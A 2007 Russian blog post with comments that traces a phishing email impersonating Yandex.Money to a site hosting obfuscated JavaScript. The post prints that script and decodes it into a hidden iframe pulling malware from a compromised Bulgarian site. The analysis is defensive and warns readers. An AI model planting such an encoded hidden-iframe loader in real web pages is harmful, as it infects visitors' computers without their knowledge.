Реклама:
культура и наука России
Вам надо только выбрать продукт жидкость для промывки теплообменников и заказать доставку.
Рейтинг блогов

Снова фишинг с Яндекс.Деньги. Или нет?

дата добавления: 30 сентября 2007 / 06:17, просмотров: 15453, комментариев: 11
Уже второй день мне на ящики приходят письма, якобы, от Яндекс.Деньги, с просьбой активировать мой кошелек, т.к. он был заблокирован. Собственно вот это письмо:

Яндекс.Деньги
Рис. 1. Письмо, вроде как от Яндекс.Деньги

Примечание: Оригинала у меня нет, я ненужные письма автоматом удаляю (Shift + Del), так что заголовки не смотрел, а это его HTML-часть, которую мне пришлось сохранить, поскольку TheBat! так и не смог показать его в нормальной кодировке.

Я практически не пользуюсь своим кошельком на Яндекс-е, поэтому, честно признаюсь, повелся на первое подобное сообщение, но делать ничего не стал, заблокировали ну и хрен с ним :-) Второе такое же письмо получил сегодня на другой свой ящик, и решил посмотреть, кто же мне это отправил. Ссылка, якобы для активации кошелька, ведет на сайт www.contidoo.com. Ради интереса, я перешел по указанной ссылке (http://www.contidoo.com/money.ya.ru/Index.html), но к сожалению, указанная страница была удалена, либо вообще никогда не существовала :-) Я пошел на главную страницу сайта, и мой файрвол сразу же стал "кричать", что некий процесс IZFP.EXE пытается изменить память другого процесса:

IZFP.EXE
Рис. 2. Процесс IZFP.EXE

Я посмотрел исходный HTML главной страницы www.contidoo.com и увидел там вот такой JavaScript:

JavaScript
Рис. 3. HTML главной страницы contidoo.com

Поскольку блокирование процесса ни к чему хорошему не привело, я нашел этот процесс в ProcessExplorer и просто убил его:

ProcessExplorer
Рис. 4. Убийство izfp.exe :-)

Надо будет еще на всякий случай проверить реестр :-)

Что касается JavaScript-а, то немного модифицировав код:

<script language="javascript" type="text/javascript">
document.write(
unescape("%2860%2C105%2C102%2C114%2C97%2C109
%2C101%2C32%2C115%2C114%2C99%2C61%2C34
%2C104%2C116%2C116%2C112%2C58%2C47%2C47
%2C119%2C119%2C119%2C46%2C118%2C97%2C108
%2C97%2C114%2C111%2C109%2C97%2C46%2C111
%2C114%2C103%2C47%2C102%2C111%2C114%2C117
%2C109%2C47%2C105%2C109%2C97%2C103%2C101%2C115
%2C47%2C97%2C118%2C97%2C116%2C97%2C114%2C115
%2C47%2C103%2C97%2C108%2C108%2C101%2C114%2C121
%2C47%2C105%2C99%2C101%2C47%2C105%2C99%2C101
%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112
%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104
%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103
%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47
%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")
);
</script>

Я получил вот такую строку:

(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,
118,97,108,97,114,111,109,97,46,111,114,103,47,102,111,114,117,109,47,105,109,97,103,101,
115,47,97,118,97,116,97,114,115,47,103,97,108,108,101,114,121,47,105,99,101,47,105,99,101,47,
105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,
104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));

String.fromCharCode(code) - функция переводит символ из его кода в его представление.
Если сейчас все это дело пропустить через функцию String.fromCharCode(), то будет видно, что это HTML-код размещения фрейма:

Фрейм
Рис. 5. Гадкий фрейм.

Т.е. получается, что пользователь заходит на сайт, и JavaScript «рисует» на странице невидимый фрейм, который в свою очередь загружает вирус. Конечно, все это дело можно было промониторить еще на стадии загрузки, но мне было как-то лень это делать, да и браузер неподходящий был, смотрел под IE 6.0.

Мой интерес меня погубит :) Пошел я на www.valaroma.org, моему взору предстала вот такая картинка:

Валарома.Орг
Рис. 6. Главная страница Valaroma.Org

Ничего интересного, обычный сайт. Проверил домен в NIC.RU, принадлежит он некому Georgi Iliev, город указан Burgas – это в Болгарии, сайт видимо тоже имеет болгарскую локализацию, хотя в лингвистических делах я не особо силен.
Собственно я думаю, сайт Валарома.Орг тут вообще не причем и на его месте мог оказаться любой другой, скорей всего какой-то злостный пользователь нашел дырку в valaroma.org и воспользовался ей в своих целях, так что после публикации этого обзора, я обязательно дам на него ссылку админам валаромы.

Дальше копать я не стал, хотя в принципе ниточек еще много, но мне как-то надоело тратить на это время :)

Удачи, и смотрите, не попадитесь на уловки мошенников ;-)

Комментарии (всего: 11)

Добавить комментарий rss
Автор: Алексей Немиро @ 30 сентября 2007, 06:33   ·   ссылка
Что касается домена ww.contidoo.com,
то вот его данные:
Administrative Contact:
Vasiljevic, Miroslav rommy[...]blic.net
DIGITAL d.o.o.
Potkozarje bb
Banja Luka, 78000
Bosnia and Herzegovina
65837949
Автор: EROS @ 30 сентября 2007, 16:07   ·   ссылка
Мне однажды тоже пришло нечто подобное.. Только там было письмо о том, что дескать на меня в систему Яндекс.Деньги поступила жалоба и мой кошелек заблокирован до выяснения обстаятельств. Далее приводился линк для перехода к это жалобе и дальнейшего разбирательства. Постукольку у меня нет кошелька я этой системе я тоже заподозрил неладное и стал ковырять код. При переходе на "жалобу" выдавалась страница абсолютно похожая на страницу авторизации в системе Яндекс.Деньги и текст который говорил о том, что для перехода к жалобе необходимо авторизоваться в личном кабинете и предлогалось ввести логин и пароль для авторизации!! :-)))
При более детальном рассмотрении выяснилось, что страница находится на одном из серверов Владикавказа (Северна Осетия) и адрес страницы отличался от оригинала только 1 буквой..
Что "они" будут с логином и паролем, я думаю и так понятно.. ))
Автор: Алексей Немиро @ 01 октября 2007, 04:10   ·   ссылка
Да, не так давно была похожая история с yanclex.ru, я тогда хозяину домена отправил письмецо с матами, десятиэтажными :-)
Интересно, на что надеются эти люди, ведь узнать, кто этим занимается не так сложно.
Автор: nektotigra @ 01 октября 2007, 10:03   ·   ссылка
гм... а что, было настолько сложно секунду подержать указатель мыши над ссылкой в теле письма и увидеть, что она (ссылка) ведет на некий .exe-файл? зачем искать дополнительных неприятностей на свою голову? особенно, работая под IE.
Автор: Алексей Немиро @ 01 октября 2007, 10:28   ·   ссылка
а что, было настолько сложно секунду подержать указатель мыши над ссылкой в теле письма и увидеть, что она (ссылка) ведет на некий .exe-файл?

естественно нет, и я знал куда переведет меня ссылка, я даже HTML посмотрел, ибо автор этого письма написал его кривовато, кавычку не открыл в ссылке (закрыть - закрыл, а открыть забыл :)) ..), видимо спешил куда-то :-))
На .exe ссылка, кстати, не вела, она вела на страницу в домене contidoo.com, в момент моего посещения этой страницы уже не было, "выпадала" 404 ошибка. А на главной странице был JavaScript, который грузил фрейм, что было в этом фрейме я не смотрел, да и не зачем. Сейчас адрес, с которого гузился фрейм, не работает, видимо его удалили.

зачем искать дополнительных неприятностей на свою голову?

а какие могут быть неприятности? Самое страшное, что может случиться, так это то, что я потеряю максимум 12 часов своего драгоценного времени, и то, в данном случае вероятность этого равна практически нулю.

особенно, работая под IE.

вот, вот, IE самый популярный браузер, а многие пользователи даже и не слышали о существовании файрволов, или используют антивирус с базами данных прошлого столетия, если вообще используют. Сложно представить, сколько людей посетили этот сайт..
Автор: Генеша @ 08 октября 2007, 06:43   ·   ссылка
Не доверяйте этим письмам.
Яндекс супорт не блокирует счет с бух-ты-барашты.
Пишите на супорт Яндекс-денек, адрес должен быть в проге кошелька и сообщите об этих бисьма.
Виновных вычаслят и покарают.
На сколько мне известно сам Яндекс счета блакирует ну ой как очень редко, если их об этом спецально не попросить.
Автор: Georgi @ 25 декабря 2007, 04:03   ·   ссылка
Здравствуйте...
Сайт Валарома.орг мой :) Попал на вам из Google вебмастер тулз... Мой русский очень плохой, и я не успел понять все, что написано здесь... если кто-то хочеть попросить мне о что-то, мое ICQ 165-661-442...

Всего хорошего,
Георги Илиев
Автор: Georgi @ 25 декабря 2007, 04:07   ·   ссылка
a етот ICE, был какой-то вирус, которой я нашел на моем хостинге... он даже сделал себе MySQL дейтабейс... валарома.орг небыл ползван долгое время а пхпББ которое было туда было очень старый вариант ... можно ето сделало security holes?
Пожалуйста поищите меня в айсикю ...
Автор: Алексей Немиро @ 25 декабря 2007, 05:09   ·   ссылка
Hello Georgi!
Мой русский очень плохой

My English too :)

In this article it is written investigation about fishing-attack.
Consequence has led me to your web-site. I have understood, that the malefactor used vulnerability in your web-site.
Do not think that I will accuse you. I understand, that you have fallen a victim to the hacker.

Надеюсь меня правильно поймут, а то так и до международного скандала не далеко :)
Автор: Лёлик @ 12 апреля 2008, 06:34   ·   ссылка
Козлы однако. Мой знакомый заплатил за телефон 230$ - червечка подхватил.
Страницы: 1 · 2

Добавить комментарий

Добавлять комментарии могут только зарегистрированные пользователи сайта.
Если у Вас уже есть учётная запись на этом сайте, пройдите процудуру авторизации.
В противном случае, зарегистрируйтесь на сайте.